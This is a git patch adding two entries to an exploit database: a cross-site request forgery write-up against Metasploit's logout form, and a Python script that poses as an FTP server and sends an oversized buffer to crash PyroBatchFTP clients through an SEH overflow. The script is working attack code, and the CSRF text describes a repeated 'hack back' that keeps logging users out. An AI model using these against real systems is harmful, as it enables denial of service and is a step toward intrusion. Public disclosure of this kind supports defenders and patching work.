From 99ad37a9180048b461cde0d4f0264965d7052be5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 9 Oct 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-10-09 2 new exploits PyroBatchFTP 3.17 - Buffer Overflow (SEH) Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery --- files.csv | 2 ++ platforms/ruby/webapps/42961.txt | 28 +++++++++++++++++++++++++ platforms/windows/dos/42962.py | 36 ++++++++++++++++++++++++++++++++ 3 files changed, 66 insertions(+) create mode 100755 platforms/ruby/webapps/42961.txt create mode 100755 platforms/windows/dos/42962.py diff --git a/files.csv b/files.csv index 5b2a41fac..1c3604cdc 100644 --- a/files.csv +++ b/files.csv @@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port 42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0 42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0 +42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -38658,3 +38659,4 @@ id,file,description,date,author,platform,type,port 42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0 42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0 42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0 +42961,platforms/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",ruby,webapps,0 diff --git a/platforms/ruby/webapps/42961.txt b/platforms/ruby/webapps/42961.txt new file mode 100755 index 000000000..3200c717a --- /dev/null +++ b/platforms/ruby/webapps/42961.txt @@ -0,0 +1,28 @@ +# Exploit Title: CSRF +# Date: Wed, Aug 30, 2017 +# Software Link: https://www.metasploit.com/ +# Exploit Author: Dhiraj Mishra +# Contact: http://twitter.com/mishradhiraj_ +# Website: http://datarift.blogspot.in/ +# CVE: CVE-2017-15084 (R7-2017-22) +# Category: Metasploit Pro, Express, Ultimate, and Community + + +1. Description + +Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser. + +2. Proof of concept + +The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout +Here's an attack vector: + +1) Set up a honeypot that detects MSF scans/attacks (somehow). +2) Once I get a probe, fire back a logout request. +3) Continue to logout the active user forever. + +It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage. + +3. Rapid7 Security Bulletin + +https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/ diff --git a/platforms/windows/dos/42962.py b/platforms/windows/dos/42962.py new file mode 100755 index 000000000..1d4394d5e --- /dev/null +++ b/platforms/windows/dos/42962.py @@ -0,0 +1,36 @@ +#!/usr/bin/python + +print "PyroBatchFTP Local Buffer Overflow (SEH) Server" + +#Author: Kevin McGuigan @_h3xagram +#Author Website: https://www.7elements.co.uk +#Vendor Website: https://www.emtech.com +#Date: 07/10/2017 +#Version: 3.17 +#Tested on: Windows 7 32-bit +#CVE: CVE-2017-15035 + + +import socket +import sys + +buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800 +port = 21 + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", port)) + s.listen(5) + print("[+] FTP server started on port: "+str(port)+"\r\n") +except: + print("[+] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') + print(conn.recv(1024)) + conn.send("331 OK\r\n") + print(conn.recv(1024)) + conn.send('230 OK\r\n') + print(conn.recv(1024)) + conn.send('220 "'+buffer+'" is current directory\r\n')